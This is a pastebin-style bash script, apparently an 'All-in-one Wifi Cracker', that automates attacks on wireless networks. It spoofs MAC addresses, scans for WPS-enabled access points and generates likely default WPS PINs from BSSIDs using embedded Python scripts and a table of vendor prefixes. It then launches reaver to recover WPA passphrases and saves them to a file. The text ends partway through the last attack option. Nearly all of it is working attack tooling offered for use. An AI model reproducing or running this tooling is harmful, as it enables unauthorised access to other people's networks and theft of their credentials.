
All-in-one Wifi Cracker

a guest Jan 6th, 2015 3,021 Never
  1. #!/bin/bash
  2.  
  3.  
  4.  
  # Terminal styling used by the menus and prompts: each colour is a tput
  # foreground code followed by bold, and STAND resets all attributes.
  # Colour 6 is cyan in the standard ANSI palette, although the variable is
  # named BLUE.
  STAND="$(tput sgr0)"
  RED="$(tput setaf 1 && tput bold)"
  GREEN="$(tput setaf 2 && tput bold)"
  BLUE="$(tput setaf 6 && tput bold)"
  9.  
  10. while :
  11. do
  12.  
  13. ###### Create scrypta storage folder if it doesn't exist ######
  14.  
  15. if [ -d $HOME/scrypta ];
  16. then
  17.    echo ""
  18. else
  19.    mkdir $HOME/scrypta
  20.    mkdir $HOME/scrypta/temp
  21.    mkdir $HOME/scrypta/Captured_Handshakes
  22.    mkdir $HOME/scrypta/Client_Scans
  23. fi
  24.  
  25. ###### Delete Missed Files In The Temp Directory ######
  26.  
  27.    rm $HOME/scrypta/temp/*.txt &> /dev/null
  28.    rm $HOME/scrypta/temp/*.py &> /dev/null
  29.    rm $HOME/scrypta/temp/*.ivs &> /dev/null
  30.    rm $HOME/scrypta/temp/*.cap &> /dev/null
  31.    rm $HOME/scrypta/temp/*.xor &> /dev/null
  32.    rm $HOME/scrypta/temp/*.csv &> /dev/null
  33.    rm $HOME/scrypta/temp/*.netxml &> /dev/null
  34.    rm $HOME/scrypta/temp/arp-packet &> /dev/null
  35.    rm $HOME/scrypta/temp/*.sh &> /dev/null
  36.  
  37. ###### START OF: DETECT mon0 MAC ADDRESS AND THEN DISPLAY SYSTEM MODE STATUS ######
  38.  
  39. mon0mac=$(ip addr | grep "radiotap" | cut -c 30-46)
  40.  
  41. if [ -s $mon0mac ]
  42. then
  43.    MonitorModeStatus=$(echo Networking Mode Enabled)
  44. else
  45.    MonitorModeStatus=$(echo Attack Mode Enabled)
  46. fi
  47.  
  48. ###### System Environment Options Menu ######
  49. clear
  50. echo $RED"#########################################"
  51. echo "#   $STAND          scrypta             $RED#"
  52. echo "#########################################"
  53. echo "#                                       #"
  54. echo "#$GREEN [1]$BLUE WiFi Adapter Selection            $RED#"
  55. echo "#$GREEN [2]$BLUE Enable Attack Or Networking Mode  $RED#"
  56. echo "#$GREEN [3]$BLUE Attack A WPS Enabled Access Point $RED#"
  57. echo "#$GREEN [4]$BLUE Capture WPA/WPA2 Handshake        $RED#"
  58. echo "#$GREEN [5]$BLUE WEP Attacks                       $RED#"
  59. echo "#$GREEN [6]$BLUE Attack Handshake.cap Files        $RED#"
  60. echo "#$GREEN [7]$BLUE Show Recovered Passkeys           $RED#"
  61. echo "#$GREEN [8]$BLUE Recovered Passkey Checker         $RED#"
  62. echo "#                                       #"
  63. echo "#########################################"
  64. echo ""
  65. echo "Chosen Interface$STAND: $wlanX"
  66. echo $RED"System Mode$STAND: $MonitorModeStatus"
  67. echo $RED"MAC address for mon0$STAND: $mon0mac"
  68. echo ""
  69. read -s -n1 -p $GREEN"Please choose an option?$STAND: " ChosenOption
  70. echo
  71. case $ChosenOption in
  72.  
  73. 1)
  74. ###### [1] START OF: CHOOSE A WIFI ADAPTER ######
  75.  
  76. cd $HOME/scrypta/temp
  77. clear
  78. Presented_WiFi_Adapters=$(airmon-ng | grep "wlan" | cut -c 1-5 | nl -ba -w 1  -s ": ")
  79. clear
  80. echo $RED"Available WiFi Adapters.$STAND"
  81. echo ""
  82. echo "$Presented_WiFi_Adapters"
  83. echo ""
  84. read -s -n1 -p $GREEN"Please input the number of your chosen WiFi adapter:$STAND " grep_Line_Number
  85. wlanX=$(echo $Presented_WiFi_Adapters | sed -n ""$grep_Line_Number"p" | cut -c 4-8)
  86. echo ""
  87. echo ""
  88. echo $RED"You've chosen:$STAND $wlanX"
  89. sleep 1
  90. cd
  91.  
  92. ;;
  93.  
  94. ###### [1] END OF: CHOOSE A WIFI ADAPTER ######
  95.  
  96. 2)
  97. ###### [2] START OF: ENABLE NETWORKING OR ATTACK MODE ######
  98.  
  99. clear
  100. echo $RED"#########################################"
  101. echo "#                                       #"
  102. echo "# $GREEN[1]$BLUE Enable Networking Mode           $RED #"
  103. echo "# $GREEN[2]$BLUE Enable Attack Mode               $RED #"
  104. echo "# $GREEN[0]$BLUE Return To Main Menu              $RED #"
  105. echo "#                                       #"
  106. echo "#########################################$STAND"
  107. echo ""
  108. read -s -n1 -p $GREEN"Choose an option, 1 or 2?:$STAND " option
  109. if [[ $option == "1" ]]; then
  110.    clear
  111.    echo $RED"Putting the system into networking mode$STAND"
  112.    airmon-ng stop mon5 > /dev/null
  113.    airmon-ng stop mon4 > /dev/null
  114.    airmon-ng stop mon3 > /dev/null
  115.    airmon-ng stop mon2 > /dev/null
  116.    airmon-ng stop mon1 > /dev/null
  117.    airmon-ng stop mon0 > /dev/null
  118.    airmon-ng stop wlanX
  119.    echo $RED"Please wait...$STAND"
  120.    ifconfig $wlanX down
  121.    ifconfig $wlanX down
  122.    wlanFakeMAC=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
  123.    ifconfig $wlanX hw ether $wlanFakeMAC
  124.    ifconfig $wlanX up
  125.    sleep 1
  126.    service network-manager start
  127.    echo ""
  128.    echo $RED"Networking mode should now be enabled, A fake MAC address has also been set.$STAND"
  129.    sleep 3
  130.    fi
  131.  
  132. if [[ $option == "2" ]]; then
  133.    clear
  134.    echo $RED"Putting the system into attack mode$STAND"
  135.    echo $RED"Please wait...$STAND"
  136.    echo ""
  137.    airmon-ng stop mon5 > /dev/null
  138.    airmon-ng stop mon4 > /dev/null
  139.    airmon-ng stop mon3 > /dev/null
  140.    airmon-ng stop mon2 > /dev/null
  141.    airmon-ng stop mon1 > /dev/null
  142.    airmon-ng stop mon0 > /dev/null
  143.    ifconfig $wlanX down
  144.  
  145. read -s -n1 -p $GREEN"Would you like to disable processes that might cause issue's Y/n?.$STAND " KillProcesses
  146. if [[ $KillProcesses == "Y" || $KillProcesses == "y" ]]; then
  147.    echo ""
  148.    echo $RED"Please wait...$STAND"
  149.    kill `pidof NetworkManager`
  150.    sleep 2
  151.    kill `pidof wpa_supplicant`
  152.    sleep 2                
  153. fi
  154.  
  155.    ifconfig $wlanX up
  156.    sleep 1
  157.    airmon-ng start $wlanX
  158.    echo $RED"Please wait...$STAND"
  159.    sleep 1
  160.    ifconfig $wlanX down
  161.    sleep 1
  162.    ifconfig mon0 down
  163.    wlanMAC1=$(macchanger -r $wlanX | grep "New" | cut -c 16-32)
  164.    ifconfig $wlanX hw ether $wlanMAC1
  165.    echo ""
  166.    sleep 1
  167.    macchanger --mac $wlanMAC1 mon0 > /dev/null
  168.    ifconfig $wlanX up
  169.    ifconfig mon0 up
  170.    echo ""
  171.    echo $RED"MAC address for $wlanX:$STAND"
  172.    macchanger -s $wlanX
  173.    echo ""
  174.    echo $RED"MAC address for mon0:$STAND"
  175.    macchanger -s mon0
  176.    echo ""
  177.    echo $RED"A Random MAC address has been set,$STAND "$wlanX"$RED and$STAND mon0$RED should now have the same fake MAC address.$STAND"
  178.    echo ""
  179.    echo $RED"Attack Mode Should Now Be Enabled.$STAND"
  180.    sleep 3
  181. fi
  182.  
  183. ;;
  184.  
  185. ###### [2] END OF: ENABLE NETWORKING OR ATTACK MODE ######
  186.  
  187. 3)
  188. ###### [3] Attack A WPS Enabled Access Point ######
  189. cd $HOME/scrypta/temp
  190. clear
  191. ############## Start Of Create WPSpin.py And easybox_wps.py ##############
  192.  
  193. ############## WPSpin.py ##############
  194. echo '
  195. import sys
  196.  
  197. VERSION    = 1
  198. SUBVERSION = 0
  199.  
  200. def usage():
  201.     print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
  202.     print "[*] Usage : python WPSpin.py 123456"
  203.     sys.exit(0)
  204.  
  205. def wps_pin_checksum(pin):
  206.     accum = 0
  207.  
  208.     while(pin):
  209.         accum += 3 * (pin % 10)
  210.         pin /= 10
  211.         accum += pin % 10
  212.         pin /= 10
  213.     return  (10 - accum % 10) % 10
  214.  
  215. try:
  216.     if (len(sys.argv[1]) == 6):
  217.         p = int(sys.argv[1] , 16) % 10000000
  218.         print "[+] WPS pin might be : %07d%d" % (p, wps_pin_checksum(p))
  219.     else:
  220.         usage()
  221. except Exception:
  222.     usage()
  223. ' > WPSpin.py
  224.  
  225. ############## easybox_wps.py ##############
  226.  
  227. echo '#!/usr/bin/env python
  228. import sys, re
  229.  
  230. def gen_pin (mac_str, sn):
  231.     mac_int = [int(x, 16) for x in mac_str]
  232.     sn_int = [0]*5+[int(x) for x in sn[5:]]
  233.     hpin = [0] * 7
  234.    
  235.     k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
  236.     k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
  237.     hpin[0] = k1 ^ sn_int[9];
  238.     hpin[1] = k1 ^ sn_int[8];
  239.     hpin[2] = k2 ^ mac_int[9];
  240.     hpin[3] = k2 ^ mac_int[10];
  241.     hpin[4] = mac_int[10] ^ sn_int[9];
  242.     hpin[5] = mac_int[11] ^ sn_int[8];
  243.     hpin[6] = k1 ^ sn_int[7];
  244.     pin = int("%1X%1X%1X%1X%1X%1X%1X" % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5], hpin[6]), 16) % 10000000
  245.  
  246.     # WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
  247.         # http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc    
  248.     accum = 0
  249.     t = pin
  250.     while (t):
  251.         accum += 3 * (t % 10)
  252.         t /= 10
  253.         accum += t % 10
  254.         t /= 10
  255.     return "%i%i" % (pin, (10 - accum % 10) % 10)
  256.  
  257. def main():
  258.     if len(sys.argv) != 2:
  259.         sys.exit("usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n")
  260.        
  261.     mac_str = re.sub(r"[^a-fA-F0-9]", "", sys.argv[1])
  262.     if len(mac_str) != 12:
  263.         sys.exit("check MAC format!\n")
  264.        
  265.     sn = "R----%05i" % int(mac_str[8:12], 16)
  266.     print "derived serial number:", sn
  267.     print "SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c" % (mac_str[6], mac_str[7], mac_str[8], mac_str[9], sn[5], sn[9])        
  268.     print "WPS pin:", gen_pin(mac_str, sn)
  269.  
  270. if __name__ == "__main__":
  271.     main()
  272. ' > easybox_wps.py
  273.  
  274. ############## End Of Create WPSpin.py And easybox_wps.py ##############
  275.  
  276. ############## Start Of Target Selection And Pin Generation ##############
  277.  
  278. clear
  279. echo $RED"Scanning for WPS-enabled access points, press Ctrl+c on the wash screen to stop the scan and choose a target."$STAND
  280. read -p $GREEN"Press [Enter] to launch the scan.$STAND"
  281. xterm -geometry 111x24+650+0 -l -lf WashScan.txt -e wash -i mon0
  282. sed -i ''1,6d';'$d'' WashScan.txt
  283.  
  284. ############## Start Of Loop Section ##############
  285.  
  286. while true
  287. do
  288.  
  289. Presented_APs=$(cat WashScan.txt | awk '{ print $6 }' | nl -ba -w 1  -s ': ' | sed '$d')
  290. clear
  291. echo $RED"Available Access Points."$STAND
  292. echo ""
  293. echo "$Presented_APs"
  294. echo ""
  295. read -p $GREEN"Please input the number of your chosen target:$STAND " grep_AP_line_number
  296.  
  297. Chosen_AP_Line=$(cat WashScan.txt | sed -n ""$grep_AP_line_number"p")
  298. AP_essid=$(echo $Chosen_AP_Line | awk '{ print $6 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  299. AP_bssid=$(echo $Chosen_AP_Line | awk '{ print $1 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  300. AP_channel=$(echo $Chosen_AP_Line | awk '{ print $2 }' | sed 's/^[ \t]*//;s/[ \t]*$//')
  301. PinMAC1=$(echo $AP_bssid | sed 's/://g' | cut -c 7-12)
  302. PinMAC2=$(echo $AP_bssid | sed 's/://g' | cut -c 1-6)
  303. WPSpin1=`python WPSpin.py $PinMAC1 | awk '{ print $7 }'`
  304. WPSpin2=`python WPSpin.py $PinMAC2 | awk '{ print $7 }'`
  305. easybox=`python easybox_wps.py $AP_bssid | grep "WPS pin" | cut -c 10-17`
  306.  
  307. ############## End Of Target Selection And Pin Generation ##############
  308.  
  309. ############## Start Of Choose A MAC Address Options ##############
  310.  
  311. clear
  312. echo $RED"Please choose a MAC address option:$STAND"
  313. echo $GREEN"[1]$BLUE = Auto Set A Random MAC address.$STAND"
  314. echo $GREEN"[2]$BLUE = Input Any MAC Address You Want To Use.$STAND"
  315. echo $GREEN"[3]$BLUE = Continue Without Changing The MAC Address.$STAND"
  316. read -s -n1 -p $GREEN"Please choose 1, 2, or 3?$STAND: " option
  317.  
  318. if [[ $option == "1" ]]; then
  319.    clear
  320.    echo $RED"Auto Setting A Random MAC Address.$STAND"
  321.    echo $RED"Please wait..."$STAND
  322.    ifconfig $wlanX down
  323.    ifconfig $wlanX down
  324.    sleep 1
  325.    ifconfig mon0 down
  326.    wlanMAC2=`macchanger -r $wlanX | grep "New" | cut -c 16-32`
  327.    ifconfig $wlanX hw ether $wlanMAC2
  328.    echo ""
  329.    sleep 1
  330.    macchanger --mac $wlanMAC2 mon0
  331.    ifconfig $wlanX up
  332.    ifconfig mon0 up
  333.    echo ""
  334.    echo $RED"MAC address for$STAND $wlanX:"
  335.    macchanger -s $wlanX
  336.    echo ""
  337.    echo $RED"MAC address for$STAND mon0:"
  338.    macchanger -s mon0
  339.    echo ""
  340.    echo $RED"A Random MAC address has been set,$STAND $wlanX$RED and$STAND mon0$RED should now have the same fake MAC address."
  341.    echo ""
  342.    sleep 4
  343.    fi
  344.  
  345. if [[ $option == "2" ]]; then
  346.    clear
  347.    echo $RED"Set A User specified MAC Address.$STAND"
  348.    echo $RED"Please wait..."$STAND
  349.    ifconfig $wlanX down
  350.    ifconfig mon0 down
  351.    echo ""
  352.    echo $RED"Setting a random MAC address."$STAND
  353.    macchanger -r $wlanX
  354.    echo ""
  355.    read -p $GREEN"Input any mac address you want to use?.$STAND " SpecifiedInterfaceMAC
  356.    ifconfig $wlanX hw ether $SpecifiedInterfaceMAC
  357.    macchanger --mac $SpecifiedInterfaceMAC mon0
  358.    ifconfig $wlanX up
  359.    ifconfig mon0 up
  360.    echo ""
  361.    echo $RED"MAC address for$STAND $wlanX:"$STAND
  362.    macchanger -s $wlanX
  363.    echo ""
  364.    echo $RED"MAC address for$STAND mon0:"$STAND
  365.    macchanger -s mon0
  366.    echo ""
  367.    sleep 2
  368.    echo $RED"A User specified MAC Address has been set, $wlanX and $monX should now have the same fake MAC address."$STAND
  369.    echo ""
  370.    echo $RED"Attack Mode Should Now Be Enabled."$STAND
  371.    sleep 2
  372.    fi
  373.  
  374. if [[ $option == "3" ]]; then
  375.    echo ""
  376. fi
  377.  
  378. ############## End Of Choose A MAC Address Options ##############
  379.  
  380. ############## Start Of Review Information ##############
  381.  
  382. clear
  383. echo $RED"Review Information."$STAND
  384. echo ""
  385. echo $RED"You've chosen$BLUE essid$RED:$STAND $AP_essid"
  386. echo $RED"You've chosen$BLUE bssid$RED:$STAND $AP_bssid"
  387. echo $RED"You've chosen$BLUE Channel$RED:$STAND $AP_channel"
  388. echo ""
  389. echo $RED"Possible$BLUE WPS Pin1$RED:$STAND $WPSpin1"
  390. echo $RED"Possible$BLUE WPS Pin2$RED:$STAND $WPSpin2"
  391. echo $RED"Possible$BLUE easybox Pin$RED:$STAND $easybox"
  392. ############## Start Of WPSPIN-1.3 Default Pin Generator ##############
  393.  
  394. ESSID=$(echo $AP_essid)
  395. BSSID=$(echo $AP_bssid)
  396.  
  # FUNC_CHECKSUM - add the check digit to the value held in PIN.
  #
  # Globals read:    PIN (the visible callers set it to ten times a value
  #                  below 10000000, so its units digit is 0 on entry)
  # Globals written: PIN, ACCUM, DIGIT, CHECKSUM, RESTE
  #
  # The seven leading digits are weighted 3,1,3,1,3,1,3 from the
  # ten-millions place down to the tens place. The check digit is
  # (10 - sum % 10) % 10 and is added to PIN. The weighted sum is then
  # recomputed over all eight digits (units digit weighted 1) and its
  # remainder mod 10 is left in RESTE.
  #
  # The last digit is therefore a pure function of the first seven and
  # contributes no additional secrecy to the PIN.
  #
  # Exit status: that of the final expr call. expr exits 1 when it prints 0,
  # so the status is non-zero whenever RESTE is 0; the visible callers
  # ignore it.
  FUNC_CHECKSUM(){
    local place weight

    # First pass: weighted sum over the seven leading digits.
    ACCUM=0
    weight=3
    for place in 10000000 1000000 100000 10000 1000 100 10; do
      ACCUM=$(expr $ACCUM + $weight \* \( \( $PIN / $place \) % 10 \))
      if [ "$weight" -eq 3 ]; then weight=1; else weight=3; fi
    done

    DIGIT=$(expr $ACCUM % 10)
    CHECKSUM=$(expr \( 10 - $DIGIT \) % 10)

    # PIN's units digit is expected to be 0 here, so the addition simply
    # places the check digit in the last position.
    PIN=$(expr $PIN + $CHECKSUM)

    # Second pass: same weights, now including the units digit.
    ACCUM=0
    weight=3
    for place in 10000000 1000000 100000 10000 1000 100 10 1; do
      ACCUM=$(expr $ACCUM + $weight \* \( \( $PIN / $place \) % 10 \))
      if [ "$weight" -eq 3 ]; then weight=1; else weight=3; fi
    done

    RESTE=$(expr $ACCUM % 10)
  }
  425.  
  426. CHECKBSSID=$(echo $BSSID | cut -d ":" -f1,2,3 | tr -d ':')
  427.  
  428. FINBSSID=$(echo $BSSID | cut -d ':' -f4-)
  429.  
  430. MAC=$(echo $FINBSSID | tr -d ':')
  431.  
  432. CONVERTEDMAC=$(printf '%d\n' 0x$MAC)
  433.  
  434. FINESSID=$(echo $ESSID | cut -d '-' -f2)
  435.  
  436. PAREMAC=$(echo $FINBSSID | cut -d ':' -f1 | tr -d ':')
  437.  
  438. CHECKMAC=$(echo $FINBSSID | cut -d ':' -f2- | tr -d ':')
  439.  
  440. MACESSID=$(echo $PAREMAC$FINESSID)
  441.  
  442. STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'`
  443.  
  444. PIN=`expr 10 '*' $STRING`
  445.  
  446. FUNC_CHECKSUM
  447.  
  448. PINWPS1=$(printf '%08d\n' $PIN)
  449.  
  450. STRING2=`expr $STRING '+' 8`
  451. PIN=`expr 10 '*' $STRING2`
  452.  
  453. FUNC_CHECKSUM
  454.  
  455. PINWPS2=$(printf '%08d\n' $PIN)
  456.  
  457. STRING3=`expr $STRING '+' 14`
  458. PIN=`expr 10 '*' $STRING3`
  459.  
  460. FUNC_CHECKSUM
  461.  
  462. PINWPS3=$(printf '%08d\n' $PIN)
  463.  
  464. if [[ $ESSID =~ ^FTE-[[:xdigit:]]{4}[[:blank:]]*$ ]] &&  [[ "$CHECKBSSID" = "04C06F" || "$CHECKBSSID" = "202BC1" || "$CHECKBSSID" = "285FDB" || "$CHECKBSSID" = "80B686" || "$CHECKBSSID" = "84A8E4" || "$CHECKBSSID" = "B4749F" || "$CHECKBSSID" = "BC7670" || "$CHECKBSSID" = "CC96A0" ]] &&  [[ $(printf '%d\n' 0x$CHECKMAC) = `expr $(printf '%d\n' 0x$FINESSID) '+' 7` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 1` || $(printf '%d\n' 0x$FINESSID) = `expr $(printf '%d\n' 0x$CHECKMAC) '+' 7` ]];
  465.  
  466. then
  467.  
  468. CONVERTEDMACESSID=$(printf '%d\n' 0x$MACESSID)
  469.  
  470. RAIZ=`expr '(' $CONVERTEDMACESSID '%' 10000000 ')'`
  471.  
  472. STRING4=`expr $RAIZ '+' 7`
  473.  
  474. PIN=`expr 10 '*' $STRING4`
  475.  
  476. FUNC_CHECKSUM
  477.  
  478. PINWPS4=$(printf '%08d\n' $PIN)
  479.  
  480. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS4  "
  481. PIN4REAVER=$PINWPS4
  482. else
  483. case $CHECKBSSID in
  484. 04C06F | 202BC1 | 285FDB | 80B686 | 84A8E4 | B4749F | BC7670 | CC96A0)
  485. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1  
  486. $RED"Other Possible Pin"$RED:$STAND $PINWPS2  
  487. $RED"Other Possible Pin"$RED:$STAND $PINWPS3"
  488. PIN4REAVER=$PINWPS1
  489. ;;
  490. 001915)
  491. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  492. PIN4REAVER=12345670
  493. ;;
  494. 404A03)
  495. echo -e "$RED"Other Possible Pin"$RED:$STAND 11866428"
  496. PIN4REAVER=11866428
  497. ;;
  498. F43E61 | 001FA4)
  499. echo -e "$RED"Other Possible Pin"$RED:$STAND 12345670"
  500. PIN4REAVER=12345670
  501. ;;
  502. 001A2B)
  503. if [[ $ESSID =~ ^WLAN_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  504. then
  505. echo -e "$RED"Other Possible Pin"$RED:$STAND 88478760"
  506. PIN4REAVER=88478760
  507. else
  508. echo -e "PIN POSSIBLE... > $PINWPS1"
  509. PIN4REAVER=$PINWPS1
  510. fi
  511. ;;
  512. 3872C0)
  513. if [[ $ESSID =~ ^JAZZTEL_[[:xdigit:]]{4}[[:blank:]]*$ ]];
  514. then
  515. echo -e "$RED"Other Possible Pin"$RED:$STAND 18836486"
  516. PIN4REAVER=18836486
  517. else
  518. echo -e "PIN POSSIBLE    > $PINWPS1"
  519. PIN4REAVER=$PINWPS1
  520. fi
  521. ;;
  522. FCF528)
  523. echo -e "$RED"Other Possible Pin"$RED:$STAND 20329761"
  524. PIN4REAVER= 20329761
  525. ;;
  526. 3039F2)
  527. echo -e "several possible PINs, ranked in order>  
  528.  16538061 16702738 18355604 88202907 73767053 43297917"
  529. PIN4REAVER=16538061
  530. ;;
  531. A4526F)
  532. echo -e "several possible PINs, ranked in order>  
  533.  16538061 88202907 73767053 16702738 43297917 18355604 "
  534. PIN4REAVER=16538061
  535. ;;
  536. 74888B)
  537. echo -e "several possible PINs, ranked in order>  
  538.  43297917 73767053 88202907 16538061 16702738 18355604"
  539. PIN4REAVER=43297917
  540. ;;
  541. DC0B1A)
  542. echo -e "several possible PINs, ranked in order>  
  543.  16538061 16702738 18355604 88202907 73767053 43297917"
  544. PIN4REAVER=16538061
  545. ;;
  546. 5C4CA9 | 62A8E4 | 62C06F | 62C61F | 62E87B | 6A559C | 6AA8E4 | 6AC06F | 6AC714 | 6AD167 | 72A8E4 | 72C06F | 72C714 | 72E87B | 723DFF | 7253D4)
  547. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1 "
  548. PIN4REAVER=$PINWPS1
  549. ;;
  550. 002275)
  551. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  552. PIN4REAVER=$PINWPS1
  553. ;;
  554. 08863B)
  555. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  556. PIN4REAVER=$PINWPS1
  557. ;;
  558. 001CDF)
  559. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  560. PIN4REAVER=$PINWPS1
  561. ;;
  562. 00A026)
  563. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  564. PIN4REAVER=$PINWPS1
  565. ;;
  566. 5057F0)
  567. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  568. PIN4REAVER=$PINWPS1
  569. ;;
  570. C83A35 | 00B00C | 081075)
  571. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  572. PIN4REAVER=$PINWPS1
  573. ;;
  574. E47CF9 | 801F02)
  575. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  576. PIN4REAVER=$PINWPS1
  577. ;;
  578. 0022F7)
  579. echo -e "$RED"Other Possible Pin"$RED:$STAND $PINWPS1"
  580. PIN4REAVER=$PINWPS1
  581. ;;
  582. *)
  583. echo -e $RED"Other Possible Pin$RED:$STAND $PINWPS1"
  584. PIN4REAVER=$PINWPS1
  585. ;;
  586. esac
  587. fi
  588.  
  589. ############## End Of WPSPIN-1.3 Default Pin Generator ##############
  590.  
  591. echo ""
  592. echo $RED"MAC address for$STAND mon0:"$STAND
  593. macchanger -s mon0
  594. sleep 4
  595.  
  596. ############## End Of Review Information ##############
  597.  
  598. ############## Start Of Scan For Clients And Store Collected MAC Addresses Option ##############
  599. echo ""
  600. read -s -n1 -p $GREEN"Would you like to scan for clients connected to the target access point? Y/n:$STAND  " ClientScan
  601.  
  602. if [[ $ClientScan == "Y" || $ClientScan == "y" ]]; then
  603.    xterm -geometry 111x24+650+0 -l -lf temp1.txt -e airodump-ng -c $AP_channel --ignore-negative-one --bssid $AP_bssid mon0
  604.    cat temp1.txt | tail -10 | sed 'N;$!P;$!D;$d' | sed -n '/STATION/,$p' >> ClientScan-$AP_bssid.txt
  605.    mv ClientScan-$AP_bssid.txt $HOME/scrypta/Client_Scans/ClientScan-$AP_bssid.txt
  606.    rm temp1.txt
  607.    echo ""
  608.    echo ""
  609.    echo $RED"Collected scan data is stored in$STAND ClientScan-$AP_bssid.txt $RED Location$STAND: $HOME/scrypta/Client_Scans"
  610.    echo ""
  611.    read -p $GREEN"Press [Enter] to continue.$STAND"
  612.    fi
  613.  
  614. if [[ $ClientScan == "N" || $ClientScan == "n" ]]; then
  615.    echo ""
  616.    fi
  617. ############## End Of Scan For Clients And Store Collected MAC Addresses Option ##############
  618.  
  619. ############## Start Of Reaver Attacks And Store Recovered Passkey ##############
  620.  
  621. clear
  622. echo $RED"Choose an attack option:"$STAND
  623. echo $GREEN"[1]$BLUE = Reaver + Auto Generated WPS Pin"$STAND
  624. echo $GREEN"[2]$BLUE = Reaver (Customisable Options)"$STAND
  625. echo
  626. read -s -n1 -p $GREEN"Please choose an option?$STAND: " yourch
  627. echo
  628. case $yourch in
  629.  
  630. 1)
  631. clear
  632. echo $RED"Choose a pin:"
  633. echo $GREEN"[1]$BLUE WPS Pin1 = $WPSpin1"
  634. echo $GREEN"[2]$BLUE WPS Pin2 = $WPSpin2"
  635. echo $GREEN"[3]$BLUE EasyBox Pin = $easybox"
  636. echo $GREEN"[4]$BLUE Other Pins = $PIN4REAVER"
  637. read -s -n1 -p $GREEN"Please choose 1, 2, 3, or 4?$STAND: " PinOption
  638.  
  639. if [[ $PinOption == "1" ]]; then
  640.    clear
  641.    echo $RED"Reaver Attack Command:"$STAND
  642.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv"
  643.    echo ""
  644.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  645.    clear
  646.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin1 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  647.    rm reaver.txt
  648.    echo ""
  649.    fi
  650.  
  651. if [[ $PinOption == "2" ]]; then
  652.    clear
  653.    echo $RED"Reaver Attack Command:"$STAND
  654.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv"
  655.    echo ""
  656.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  657.    clear
  658.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $WPSpin2 -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  659.    rm reaver.txt
  660.    echo ""
  661.    fi
  662.  
  663. if [[ $PinOption == "3" ]]; then
  664.    clear
  665.    echo $RED"Reaver Attack Command:"$STAND
  666.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv"
  667.    echo ""
  668.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  669.    clear
  670.    reaver -i mon0 -c $AP_channel -b $AP_bssid -p $easybox -d 2 -t 2 -T 2 -vv -C "sed -i 's/^....//' reaver.txt && cat reaver.txt | grep 'AP SSID' | sed 's/AP SSID/AP ESSID/' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo AP BSSID: $AP_bssid >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPS PIN:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && grep 'WPA PSK:' reaver.txt >> $HOME/scrypta/Recovered-WPA-Passkeys.txt && echo ' ' >> $HOME/scrypta/Recovered-WPA-Passkeys.txt" | tee reaver.txt
  671.    rm reaver.txt
  672.    echo ""
  673.    fi
  674.  
  675. if [[ $PinOption == "4" ]]; then
  676.    clear
  677.    echo $RED"Reaver Attack Command:"$STAND
  678.    echo "reaver -i mon0 -c $AP_channel -b $AP_bssid -p $PIN4REAVER -d 2 -t 2 -T 2 -vv"
  679.    echo ""
  680.    read -p $GREEN"Press [Enter] to launch the attack.$STAND"
  681.    clear
